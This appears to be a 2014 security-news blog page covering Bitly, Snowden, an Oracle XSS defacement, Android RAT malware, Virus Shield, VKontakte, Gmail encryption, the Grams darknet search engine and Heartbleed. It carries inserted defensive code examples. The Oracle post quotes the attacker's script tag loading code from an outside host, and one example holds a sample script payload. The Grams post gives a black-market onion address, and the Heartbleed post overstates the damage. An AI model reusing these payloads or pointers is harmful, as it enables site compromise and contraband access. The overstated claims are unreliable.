Friday, May 9, 2014

URL Shortening service Bitly hacked, Change your password and Revoke Access from your social accounts post by Anand Garg

One of the biggest URL shortening services, Bitly, has been hacked through a security breach, and hackers have stolen your passwords and, most importantly, OAuth tokens, which we use to log in to Bitly through our social accounts like Facebook and Twitter.

Monday, May 5, 2014

Government starts testing a Program in which a user must have License (Internet ID) to access the Internet post by Anand Garg


The National Institute of Standards and Technology (NIST) has issued $2.4 million for testing a government-based online identity system in Michigan and Pennsylvania. The initiative has been in development for years under the “National Strategy for Trusted Identities in Cyberspace” program and is now being rolled out for field testing.

Snowden says that everyone is now under government surveillance post by Anand Garg


    Snowden Screenshot during a talk
Edward Snowden, former CIA contractor, declared during a debate regarding the NSA intelligence gathering programs that government surveillance has reached a new level. During the debate, which took place in Toronto, Snowden declared that the entire population is being monitored, meaning that the intelligence gathering programs do not discriminate between individual citizens:
“It’s no longer based on the traditional practice of targeted taps based on some individual suspicion of wrongdoing” Snowden said. “It covers phone calls, emails, texts, search history, what you buy, who your friends are, where you go, who you love.”

Friday, April 25, 2014

Jailbroken iPhones are being targeted by an active malware campaign, stealing passwords Post by Anand Garg


A malware campaign has been unearthed by security researcher Stefan Esser after many users of jailbroken iPhones and iPads posted on Reddit that their devices crashed repeatedly after installing unofficial tweaks through a third-party app store called ‘Cydia’, which serves the market of jailbroken Apple devices.

Two Anonymous Hackers arrested in Joint Operation With FBI Post by Anand Garg

Cambodian National Police arrested two members of Anonymous Cambodia earlier this month, on April 7, in a joint operation with the U.S. Federal Bureau of Investigation (FBI) that has been running for about eight months, according to a statement available on the website of the National Police. Both arrested persons are members of the global ‘Anonymous’ hacking group, which called for an attack on Israeli cyberspace on the same date, 7th April.
They are identified as Bun Khing Mongkul Panha and Chou Songheng. Both are 21 years old and were third-year students at the SETEC Institute, a Phnom Penh-based university. Panha is identified online as ‘Sex Machine’ and ‘Black Cyber’ whereas Songheng is known in cyberspace as ‘Zoro’. The reason for their arrest is the hacking of 30 government websites as well as some private business websites. The hacking profile includes big names such as National Election Committee (NEC), Ministry of Foreign Affairs, Ministry of Defense, Anti-Corruption Unit and Phnom Penh Municipality.
Mr. Panha has confessed about the hacking and Mr. Songheng said he just wanted to learn hacking and is Mr. Panha’s student.
“He just wanted to learn about it. That is why he decided to join the hacker group,” the statement said of Mr. Songheng.
They were arrested under articles 427, 428 and 429 of the Cambodian Criminal Code, which concern information technology and penalize the culprit with a fine of 500 USD to 1000 USD and one to two years behind bars.
“The suspects are still under investigation by the court, so they have detained them for trial,” said Dim Chaoseng, the lawyer for Mr. Panha and Mr. Songheng.
Rasch, the former head of the U.S. Department of Justice Computer Crime Unit, said:
“These are not considered major crimes.”
“Since [Cambodia] doesn’t have a cybercrime law, they can’t charge them with more serious crimes.”
Lieutenant General Chhay Sinarith, director of the Ministry of Interior’s internal security department, said the arrest is part of an ongoing effort in cooperation with the FBI. He said:
“The National Police were cooperating with the FBI to conduct an investigation on [hacking] when we found out these two suspects hacked the NEC…and other government institutions.”
Reference: hackersnewsbulletin.com

Meet the First Password Free email service, now you don’t have to remember your passwords Post by Anand Garg


Wednesday, April 23, 2014

ORACLE Subdomain Page Defaced by Indian Hacker


A group of Indian hackers dubbed I-HOS TEAM has successfully defaced a page on a subdomain of Oracle Corporation, the biggest provider of enterprise software, computer hardware and services.

Users visiting the domain are greeted with a custom webpage with a black background and the theme song of an Indian movie, “BOSS”. The defacement page displays a logo with the title “IHOS - Indian Hackers Online Squad” and a message for all Indian hackers: “LOVE TO ALL INDIAN HACKERS OUT THERE.”

Neither the website nor the server was actually compromised, but the Hacker going by online alias ‘Bl@Ck Dr@GoN’, actually found a page on the Oracle website that allows him to inject HTML/JavaScript code into the Oracle University Electronic Attendance webpage in order to modify the content, as shown in the screenshot provided to The Hacker News:
[Screenshot: Oracle website hacked]
The hacker told THN that anyone is able to edit the student name on the website and can insert any code, which is not sanitized properly by the Oracle website. It is awful to see that the world’s biggest programming and software company failed to protect its website from a very basic Cross Site Scripting vulnerability.
Injected Javascript: <script src=http://oppwnjms.loomhost.com/bd1.js></script>
At the time of writing, the website was defaced and in case it got fixed, users may check the defaced website’s mirror at Zone-H.

In most cases, a hacker looks to promote a specific cause when defacing a high-profile site, but in this case there seems to be no specific reason for defacing the web page. We have mostly seen hackers deface websites with boring messages like “Hello World” or similar, but this is the first time an Oracle web page is playing Yo Yo Honey Singh’s beat-full song.
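
The flaw described above, an editable student name written into the page without sanitization, is shown here as an added example that is not from the original post and is not Oracle's code. The renderer, the function names and the sample names are hypothetical; the vulnerable form sits beside output encoding, input validation and an audit of already-stored values.

```javascript
// Added example: a hypothetical attendance-page renderer, not Oracle's code.

// VULNERABLE: the student name is concatenated into the markup unchanged,
// so any tags it contains become part of the page.
function renderRowUnsafe(studentName) {
  return '<tr><td class="student">' + studentName + '</td></tr>';
}

// Output encoding for HTML text and quoted-attribute contexts.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  // Single pass, so an '&' produced by one replacement is never escaped again.
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// HARDENED: encode at the point of output, whatever is stored.
function renderRowSafe(studentName) {
  return '<tr><td class="student">' + escapeHtml(studentName) + '</td></tr>';
}

// Second layer: reject values that cannot be a name before storing them.
// Allowed: letters and combining marks in any script, space, '.', "'" and '-'.
function isPlausibleName(value) {
  return typeof value === 'string' &&
    value.length > 0 && value.length <= 100 &&
    /^[\p{L}\p{M} .'-]+$/u.test(value);
}

// Audit helper: list already-stored names that fail validation.
function auditStoredNames(names) {
  return names.filter((name) => !isPlausibleName(name));
}

// Crude check used only to compare the two renderers below.
function hasScriptElement(html) {
  return /<script\b/i.test(html);
}

// Constructed sample data; attacker.example is a placeholder host.
const PAYLOAD = '<script src=http://attacker.example/x.js></script>';
const STORED_NAMES = ['Anand Garg', "Siobhán O'Brien", PAYLOAD, '<b>Bob</b>'];

console.log(renderRowUnsafe(PAYLOAD)); // markup survives intact
console.log(renderRowSafe(PAYLOAD));   // markup is displayed as text
console.log(auditStoredNames(STORED_NAMES));
```

Encoding at output is the control that closes the hole; the name validation and the audit only reduce what reaches the renderer and help find records that were already modified.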

Windows Spy tool equipped with Android malware to hack Smartphones


I am quite sure that you must be syncing your Smartphone with your Computers for transferring files and taking backup of your device.

If you are using the Windows operating system and Android devices, then it’s bad news for you, because FireEye security researchers have identified a new piece of Windows malware that can also infect your Android devices.

During an investigation of a targeted attack on a US based financial institution, researchers spotted a new version of Windows Remote Access Trojan (RAT) called 'Win-Spy Software Pro v16', a spying and monitoring tool. WinSpy was embedded in macro documents to kick off a spam campaign via a spear phishing email.

“The recent surge in Android-based RATs such as Dendroid and AndroRAT shows a spike in the interest of malicious actors to control mobile devices. GimmeRAT is another startling example of malicious actors venturing into the Android ecosystem,” security firm said.

The researchers dubbed the Android spying component pre-loaded with WinSpy GimmeRat; it allows hackers to control the victim’s device remotely from their own phone over SMS, or alternatively through a Windows-based controller.

"We also discovered various Android components that can be employed to engage in surveillance of a target."  security firm said in a blog post.
To install the Android malware, WinSpy communicates with mobile devices connected to the infected computer using a command line tool called Android Debug Bridge (ADB), that allows the Windows malware to execute commands on the Android device. ADB is a legitimate tool and part of the official Android software development kit (SDK). If USB debugging Mode is enabled on the device, it initiates the installation process.

The new Android components also smooth the ways for surveillance of the target and there are three different applications that are part of the Android surveillance package.

“We have found three different applications that are a part of the surveillance package. One of the applications requires commandeering via a window controller and requires physical access to the device while the other two applications can be deployed in a client-server model and allow remote access through a second Android device,” wrote the researchers.

The technique is not new. A similar payload was used by another Windows malware called ‘Trojan.Droidpak’ to infect Android devices, which was discovered by antivirus firm Symantec in January.

Using the Android malware, the attackers could trace victims’ GPS location, take screenshots of victims’ devices and send this data to the remote Command-and-Control servers. The Trojan is also well suited to monitoring the device's text messages.

"The hostname, port, username, and password are used to connect to the attackers’ FTP server to send screenshots, which is explained, in a later section. Once this intent is received the GlobalService is restarted with the interval parameter.." FireEye said.

When a Windows system is infected with WinSpy, an attacker can take screenshots, log keystrokes and also use it to open a backdoor for uploading and downloading more files and executing remote commands.

With the widespread use of smartphones, the adoption of mobile platforms such as Android has increased, and so the cybercriminal market demands RATs that support these platforms. Such tactics can be used to serve fake mobile banking apps. Fairly evil ideas!
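
Because the Android component is installed through ADB from the infected Windows machine, and only when USB debugging is enabled on the phone, one host-side check is to look for adb being started by something other than a developer tool. The following is an added example, not code from the post or from FireEye: it uses Sysmon Event ID 1 field names, while the events, the allowlist and the SDK path are constructed assumptions.

```javascript
// Added example: triage of process-creation events for unexpected adb use.
// Field names follow Sysmon Event ID 1; the events themselves are constructed.
const SAMPLE_EVENTS = [
  { host: 'DEV-07', Image: 'C:\\Android\\sdk\\platform-tools\\adb.exe',
    ParentImage: 'C:\\Program Files\\Android\\Android Studio\\bin\\studio64.exe',
    CommandLine: 'adb.exe install app-debug.apk' },
  { host: 'FIN-12', Image: 'C:\\Users\\alice\\AppData\\Local\\Temp\\adb.exe',
    ParentImage: 'C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE',
    CommandLine: '"C:\\Users\\alice\\AppData\\Local\\Temp\\adb.exe" -d install -r update.apk' },
  { host: 'FIN-12', Image: 'C:\\Windows\\System32\\notepad.exe',
    ParentImage: 'C:\\Windows\\explorer.exe',
    CommandLine: 'notepad.exe report.txt' },
  { host: 'HR-03', Image: 'C:\\Android\\sdk\\platform-tools\\adb.exe',
    ParentImage: 'C:\\Windows\\System32\\cmd.exe',
    CommandLine: 'adb.exe devices' },
];

// Hypothetical site policy: who may start adb, and from where.
const POLICY = {
  allowedParents: ['studio64.exe'],
  approvedAdbDirs: ['c:\\android\\sdk\\platform-tools\\'],
  deviceChangingVerbs: ['install', 'install-multiple', 'push', 'shell', 'sideload'],
};

function baseName(path) {
  return path.split(/[\\/]/).pop().toLowerCase();
}

// Extract the adb sub-command, skipping the executable and global switches.
function adbVerb(commandLine) {
  const rest = commandLine.replace(/^\s*("[^"]+"|\S+)\s*/, '');
  const tokens = rest.split(/\s+/).filter(Boolean);
  for (let i = 0; i < tokens.length; i++) {
    if (tokens[i] === '-s') { i++; continue; }   // -s <serial> takes an argument
    if (tokens[i].startsWith('-')) continue;     // other global switches, e.g. -d
    return tokens[i].toLowerCase();
  }
  return null;
}

// Returns a finding for adb launches that break policy, otherwise null.
function evaluateEvent(event, policy) {
  if (baseName(event.Image) !== 'adb.exe') return null;
  const reasons = [];
  if (!policy.allowedParents.includes(baseName(event.ParentImage))) {
    reasons.push('unexpected-parent');
  }
  const image = event.Image.toLowerCase();
  if (!policy.approvedAdbDirs.some((dir) => image.startsWith(dir))) {
    reasons.push('unapproved-path');
  }
  if (reasons.length === 0) return null;
  const verb = adbVerb(event.CommandLine);
  // Commands that change the phone rank above read-only ones such as "devices".
  const severity = policy.deviceChangingVerbs.includes(verb) ? 'high' : 'medium';
  return { host: event.host, verb, severity, reasons };
}

function triage(events, policy) {
  return events.map((e) => evaluateEvent(e, policy)).filter((f) => f !== null);
}

console.log(triage(SAMPLE_EVENTS, POLICY));
```

On the device side, keeping USB debugging switched off removes the precondition the post describes.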

Google Gives Refund to Thousands of Buyers Who Bought Bogus Android AntiVirus App Post by Anand Garg


About a week back we reported about a popular paid Antivirus application on the Google Play Store which was actually a scam, dubbed as ‘Virus Shield’.

This first paid fake app managed to become one of the most popular anti-virus apps in less than a week; apparently more than 10,000 smartphone users purchased it for $3.99 from the Google Play Store, and were hence scammed out of more than $40,000.

The Virus Shield Android app claimed to protect users’ personal information from harmful viruses, malware and spyware, but in reality the app doesn't scan anything, and it was removed from the store once the fraud had been uncovered.

If you were one of those who downloaded the Virus Shield Antivirus app, then don't worry; just check your email inbox, because Google cares about you and is reaching out to all the affected Android users who purchased the app in order to refund their money in full.

REFUND WITH $5 BONUS CREDIT
According to Android Police, Google has decided to refund the $3.99 to users and, apart from the full refund, to maintain its reputation among users, Google is offering each an extra $5 Google Play Store credit, which can be used to purchase digital content on the Google Play store such as apps, games, books, music and movies.
“Google Play’s policies strictly prohibit false claims like these, and in light of this, we’re refunding you for your “Virus Shield” purchase. You should see funds returned to your account within the next 14 days. Additionally, we'd like to offer you $5 promotional credit, which can be used to purchase digital content on Google Play such as apps, games, books, music and movies.” Google Play Support said.
The developer of the Virus Shield app approached The Guardian newspaper to claim that the app without the virus protection was uploaded to the Play Store by mistake and that he removed the app from the Play Store himself before his developer account was suspended.
"One of our developers simply made a foolish mistake. The app version that was decompiled by AndroidPolice was not intended to be released. It was an early placeholder that our ui designer created. There was a mix-up between the version that contained the antivirus code for our app." app developer Jesse Carter of Deviant Solutions said.

GOOGLE APOLOGY LETTER
Hello,
We're reaching out to you because you recently purchased the “Virus Shield” app on Google Play. This app made the false claim that it provided one-click virus protection; in reality, it did not.
Google Play’s policies strictly prohibit false claims like these, and in light of this, we’re refunding you for your “Virus Shield” purchase. You should see funds returned to your account within the next 14 days.
Additionally we'd like to offer you $5 promotional credit, which can be used to purchase digital content on Google Play such as apps, games, books, music and movies.
Your credit redemption code is XXXXXXXXXXXXXXX. Click or tap here to redeem. For help redeeming, please visit our Help Center.
We're sorry for any inconvenience this may have caused; rest assured that we're always working to make Google Play better for our users.
Thank you,
Google Play Support
Google learned from their mistake and promised that such apps will never get top position, even if allowed to be listed in the Play Store.

Reference: The Hacker News

Russian Facebook 'VKontakte' Dramatically Fires Original Founder 'Pavel Durov' Post by Anand Garg




Yesterday reports revealed that Pavel Durov, the 29-year-old founder of Russia’s most popular social networking site VKontakte (VK) - Russia’s Facebook, had been fired from his post of general director of Vkontakte.

On Monday, Durov said that the social networking site VK is now under the complete control of two close allies of President Vladimir Putin.

Publicly announcing his firing on his VK page he said, “In this way, today VKontakte goes under the complete control of Igor Sechin and Alisher Usmanov. Probably, in the Russian context, something like this was inevitable, but I'm happy we lasted seven and a half years. We did a lot. And part of what’s been done can't be turned back.”

Last month, on 21st March, the 29-year-old entrepreneur announced that he had submitted his resignation, but earlier this month he said he had rescinded his resignation as the company’s CEO because it was an April Fool prank; unfortunately, he supposedly failed to properly withdraw it before a one-month deadline had expired.

PUTIN ALLIES 'ALISHER USMANOV' & 'IGOR SECHIN' CONTROL VKontakte
Of the current owners, Alisher Usmanov is Russia's richest man and head of the Mail.ru service, and Igor Sechin is the CEO of a state-owned oil company and reportedly a close Putin ally.

Durov claims he heard news of his resignation from the press, not from the company's managing board. “It is interesting that the shareholders did not have enough courage to do it directly,” Durov wrote on his VK page, “about this mysterious dismissal I learnt from the press.”

The social media site boasts over 100 million users, and Durov as CEO has largely stayed out of politics. He also refused the previous Kremlin attempts to censor VKontakte, including not shutting down the page of a Putin rival, Alexey Navalny, or Ukrainian protesters.

He had resisted releasing personal information about opposition activists who use VK, even after increasing pressure from the Federal Security Services.

DUROV SOLD HIS 12% STAKE IN VK
In January this year, Pavel Durov suddenly sold out his remaining 12 percent stake in VK, estimated at a value of $420 million, to MegaFon chief Ivan Tavrin, which is co-owned by Alisher Usmanov. He said, "I’m not going anywhere and I’m going to continue to monitor the quality of VKontakte. In the end, VKontakte is the best that has been created in Russia in the sphere of communications. And my responsibility is to preserve and protect the network."

Durov founded VKontakte in 2006 with an interface quite similar to that of Facebook. Due to its user-friendly interface and virtually unlimited access to videos and music freely uploaded by other users, the social network became hugely popular and became Russia’s leading social network, with almost 61 million active users in Russia alone and approximately 100 million users worldwide.

From now on, VKontakte’s control is in the hands of billionaire Alisher Usmanov's Mail Group, which holds 52 percent of the company shares and the remaining 48 percent is controlled by investment group United Capital Partners.

At this time the situation around the CEO position is very dramatic, and it is not yet clear who will be appointed as the new CEO, but until then deputy chief executive Boris Dobrodeyev and executive director Dmitry Sergeyev will lead VK.

Last week, during a live interview on a national news channel, Edward Snowden asked a surprise question of Russian President Vladimir Putin, “Does Russia store, intercept, or analyze, in any way, the communications of millions of individuals?”, and the President denied it, replying that Russia is not carrying out any mass surveillance programmes, but media around the world criticized this interview as a PR stunt to hide the Russian surveillance scene.

Reference: The Hacker News

Google Working On End-to-End Encryption for Gmail Service Post by Anand Garg


Revelations forced the popular Internet Giants such as Google and Yahoo to contemplate on the privacy and security issues and in response companies started enhancing their encryption standard by enabling HTTPS by default and removed the option to turn it off.

A few days back, Google admitted that their automated systems read your content, including incoming and outgoing emails to provide you personally relevant advertisements. That means Internet giants generally do encrypt your data, but they have the key so they can decrypt it any time they want.

Encryption is mandatory on the modern Internet, and web services should consider encrypting and decrypting your data locally, so that no one can snoop on it. Such a cryptographic mechanism is called end-to-end encryption, which means the content of your messages would be known to you and your browser, but not to Google itself.

GMAIL END-to-END ENCRYPTION
Unknown sources from Google have confirmed that the company is finally planning to take another step to ensure its users' privacy by implementing more complex encryption tools such as the secure PGP (Pretty Good Privacy).

PGP has been an open source end-to-end encryption standard for almost 20 years, used to encrypt e-mail over the Internet, providing cryptographic privacy and authentication for data communication, which makes it very difficult to break. So, bringing PGP to the Gmail service will result in much stronger end-to-end encryption for emails.

The Sources acknowledged that the end-to-end encryption is best from a security standpoint and also compatible with Gmail, but implementing it on the end-user requires significant efforts.

End-to-End Encryption to the email service basically implies that only the sender and receiver can read the contents of a message and nobody else, so it offers stronger protection than SSL/TLS.

ISSUES WITH ENCRYPTION IMPLEMENTATION 
Well, there could be some issues with such an encryption implementation, and right now we don't know exactly what measures Google will take, but there are two major issues that we and Google will have to deal with at the same time:
  1. How would the Crypto Keys be managed? PGP protected emails would require decryption keys that only the sender and recipient would have to read the content transmitted between the two, and ideally Google won't have access to the messages.
  2. What about the features of Gmail that rely on Email Content? This means that the adoption of PGP encryption could be problematic for Google as it won’t allow them to scan your emails to serve its spam filtering feature, content-based advertisements and even the search option.
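
Both issues above, who holds the keys and what happens to features that read message content, can be seen in a small sketch. This is an added example, not Gmail's design and not the OpenPGP message format: it stands in RSA-OAEP plus AES-256-GCM from Node's built-in crypto module for PGP's hybrid scheme, and every function name and the sample message are assumptions.

```javascript
// Added illustration of end-to-end encryption; not Gmail's or PGP's format.
const nodeCrypto = require('node:crypto');

const OAEP = { padding: nodeCrypto.constants.RSA_PKCS1_OAEP_PADDING, oaepHash: 'sha256' };

// Issue 1, key management: the recipient generates the pair and publishes
// only the public half. The mail provider never sees the private key.
function generateRecipientKeys() {
  return nodeCrypto.generateKeyPairSync('rsa', { modulusLength: 2048 });
}

// Sender: encrypt the body with a one-time session key, then wrap that key
// for the recipient. The returned envelope is all the provider stores.
function encryptForRecipient(publicKey, plaintext) {
  const sessionKey = nodeCrypto.randomBytes(32);
  const iv = nodeCrypto.randomBytes(12);
  const cipher = nodeCrypto.createCipheriv('aes-256-gcm', sessionKey, iv);
  const ciphertext = Buffer.concat([cipher.update(plaintext, 'utf8'), cipher.final()]);
  return {
    wrappedKey: nodeCrypto.publicEncrypt({ key: publicKey, ...OAEP }, sessionKey).toString('base64'),
    iv: iv.toString('base64'),
    tag: cipher.getAuthTag().toString('base64'),
    ciphertext: ciphertext.toString('base64'),
  };
}

// Recipient: unwrap the session key and decrypt. Returns null when the key
// is wrong or the message was modified in transit or at rest.
function decryptAsRecipient(privateKey, envelope) {
  try {
    const sessionKey = nodeCrypto.privateDecrypt(
      { key: privateKey, ...OAEP }, Buffer.from(envelope.wrappedKey, 'base64'));
    const decipher = nodeCrypto.createDecipheriv(
      'aes-256-gcm', sessionKey, Buffer.from(envelope.iv, 'base64'));
    decipher.setAuthTag(Buffer.from(envelope.tag, 'base64'));
    const body = Buffer.concat([
      decipher.update(Buffer.from(envelope.ciphertext, 'base64')),
      decipher.final(), // throws if the authentication tag does not match
    ]);
    return body.toString('utf8');
  } catch (err) {
    return null;
  }
}

function keywordHits(text, keywords) {
  const lower = text.toLowerCase();
  return keywords.filter((k) => lower.includes(k));
}

// Issue 2, content features: a server-side scan only has ciphertext to read,
// so keyword-based filtering, ad matching and search find nothing.
function providerScan(envelope, keywords) {
  return keywordHits(Buffer.from(envelope.ciphertext, 'base64').toString('latin1'), keywords);
}

// The same scan works on the recipient's device, after decryption.
function clientScan(privateKey, envelope, keywords) {
  const text = decryptAsRecipient(privateKey, envelope);
  return text === null ? [] : keywordHits(text, keywords);
}

// Simulates modification of the stored message by flipping one bit.
function tamper(envelope) {
  const bytes = Buffer.from(envelope.ciphertext, 'base64');
  bytes[0] ^= 0x01;
  return { ...envelope, ciphertext: bytes.toString('base64') };
}
```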
GOOGLE WILL CHARGE FOR SECURE EMAIL SERVICE?
Because Google will not be able to monetize end-to-end encrypted emails, it is possible that, rather than offering a free email service, Google will start charging, optionally, users who want the encrypted service. We hope that Google will soon shed more light on their end-to-end encryption initiatives. Stay tuned.

Stronger end-to-end encryption will certainly be appreciated by Gmail users, but meanwhile you should know that major Desktop Email clients such as Microsoft Outlook and Mozilla Thunderbird with the Enigmail plugin can be configured manually to work smoothly with PGP encryption software, making it a simple matter of clicking a button to sign, verify, encrypt and decrypt email messages. Learn How to use PGP to Secure your Email Communication.

Reference: The Hacker News

Grams - First Search Engine for Underground Black Markets Post by Anand Garg

We often talk about underground communities, illegal websites or black markets, but as they are ‘underground’ in nature, i.e. hidden websites running under the Onion network, many of us don't know how to reach the one we are searching for, and if it is found, it's difficult to figure out a trustworthy vendor.

Underground websites offer illegal high quality drugs or rifles, hacking tools, or any illegal services. Until now you needed to type long, complex and specific Tor browser URLs directly into the browser, which is quite difficult, and sometimes the sites change their addresses, which makes them more difficult to navigate.

Not any more! The first search engine for online underground black markets, ‘Grams’ (http://grams7enufi7jmdl.onion), was launched in beta last week; it lets anyone find illegal drugs and other contraband online more easily than ever, and it's pretty fast, like the Google search engine.

You don't need to do anything special: just as you type what you are looking for into search engines like Google, the same goes for this Deep Web search engine, Grams. It also looks like Google and is the most comprehensive way to find all illegal things.

“I am working on the algorithm so it is a lot like google's it will have a scoring system based how long the listing has been up, how many transactions, how many good reviews. That way you will see the best listing first,” Grams’ creator who calls himself Gramsadmin wrote on Reddit. He also added, “I am going to add a filter market this week so a user can search only the markets they have accounts for.”

Currently Grams search engine crawls results from eight different black markets, including Agora, BlackBank, C9, Evolution, Mr. Nice Guy, Pandora, The Pirate Market, and SilkRoad2. From online conversations, it is estimated that the developer of Grams is trying to contact more underground website owners to offer them indexing their websites on his search engine.

Reference: The Hacker News

Monday, April 21, 2014

List of Most Popular Websites affected by Heartbleed (The Biggest security breach), CHANGE YOUR PASSWORD NOW Post by Anand Garg

As we are already aware, the recent biggest security breach on the internet, known as the ‘Heartbleed Bug’, clearly hacked all of your passwords and your personal and financial information, like credit card numbers, that you use on some popular sites like Facebook, Google, Yahoo and more, so it’s time to ping you about the sites which are affected by this bug.
We have listed below the most popular sites which are affected by the flaw:
WEBSITE | AFFECTED? | WHAT THEY SAID?
Amazon Web Services (for website operators) | YES | Most services were unaffected or Amazon was already able to apply mitigations (see advisory note here). Elastic Load Balancing, Amazon EC2, Amazon Linux AMI, Red Hat Enterprise Linux, Ubuntu, AWS OpsWorks, AWS Elastic Beanstalk and Amazon CloudFront were patched.
American Funds | YES | American Funds told customers to change their username and passwords, as the company "learned of a very narrow window of risk to those who logged into americanfunds.com between December 12, 2013 and April 14, 2014."
Box | YES | "We're currently working with our customers to proactively reset passwords and are also reissuing new SSL certificates for added protection."
Dropbox | YES | ON TWITTER: "We’ve patched all of our user-facing services & will continue to work to make sure your stuff is always safe."
Etsy | YES | Etsy said that only a small part of its infrastructure was vulnerable, and they have patched it.
Facebook | YES | "We added protections for Facebook’s implementation of OpenSSL before this issue was publicly disclosed. We haven’t detected any signs of suspicious account activity, but we encourage people to ... set up a unique password."
Flickr | YES | "As soon as we became aware of the issue, we began working to fix it... and we are working to implement the fix across the rest of our sites right now."
GitHub | YES | GitHub said it has patched all its systems, deployed new SSL certificates and revoked old ones. GitHub is asking all users to change password, enable two-factor authentication and "revoke and recreate personal access and application tokens."
Gmail | YES | “We have assessed the SSL vulnerability and applied patches to key Google services.” *Google said users do not need to change their passwords, but because of the previous vulnerability, better safe than sorry.
GoDaddy | YES | "We’ve been updating GoDaddy services that use the affected OpenSSL version."
Google | YES | “We have assessed the SSL vulnerability and applied patches to key Google services.” Search, Gmail, YouTube, Wallet, Play, Apps and App Engine were affected; Google Chrome and Chrome OS were not. *Google said users do not need to change their passwords, but because of the previous vulnerability, better safe than sorry.
IFTTT | YES | IFTTT emailed all its users and logged them out, prompting them to change their password on the site.
Instagram | YES | "Our security teams worked quickly on a fix and we have no evidence of any accounts being harmed. But because this event impacted many services across the web, we recommend you update your password on Instagram and other sites, particularly if you use the same password on multiple sites.”
Minecraft | YES | "We were forced to temporary suspend all of our services. ... The exploit has been fixed. We can not guarantee that your information wasn't compromised."
Netflix | YES | "Like many companies, we took immediate action to assess the vulnerability and address it. We are not aware of any customer impact. It’s a good practice to change passwords from time to time, now would be a good time to think about doing so. "
OKCupid | YES | "We, like most of the Internet, were stunned that such a serious bug has existed for so long and was so widespread."
Pinterest | YES | "We fixed the issue on Pinterest.com, and didn’t find any evidence of mischief. To be extra careful, we e-mailed Pinners who may have been impacted, and encouraged them to change their passwords."
SoundCloud | YES | SoundCloud emphasized that there were no indications of any foul play and that the company's actions were simply precautionary.
Tumblr | YES | "We have no evidence of any breach and, like most networks, our team took immediate action to fix the issue."
Venmo | YES | Venmo sent an email to its users, saying the company took "immediate steps to patch the potential vulnerability" and recommended that they change their passwords.
Wikipedia | YES | "We recommend changing your password as a standard precautionary measure, but we do not currently intend to enforce a password change for all users."
Wordpress | YES | Wordpress confirmed that it was vulnerable to Heartbleed and that it has patched its servers "within a few hours of the public disclosure." Wordpress is not forcing users to change their passwords, but said users "are welcome" to do it.
Wunderlist | YES | "You’ll have to simply log back into Wunderlist. We also strongly recommend that you reset your password for Wunderlist."
Yahoo | YES | "As soon as we became aware of the issue, we began working to fix it... and we are working to implement the fix across the rest of our sites right now." Yahoo Homepage, Yahoo Search, Yahoo Mail, Yahoo Finance, Yahoo Sports, Yahoo Food, Yahoo Tech, Flickr and Tumblr were patched. More patches to come, Yahoo says.
Yahoo Mail | YES | "As soon as we became aware of the issue, we began working to fix it... and we are working to implement the fix across the rest of our sites right now."
YouTube | YES | “We have assessed the SSL vulnerability and applied patches to key Google services.”
Reference: hackersnewsbulletin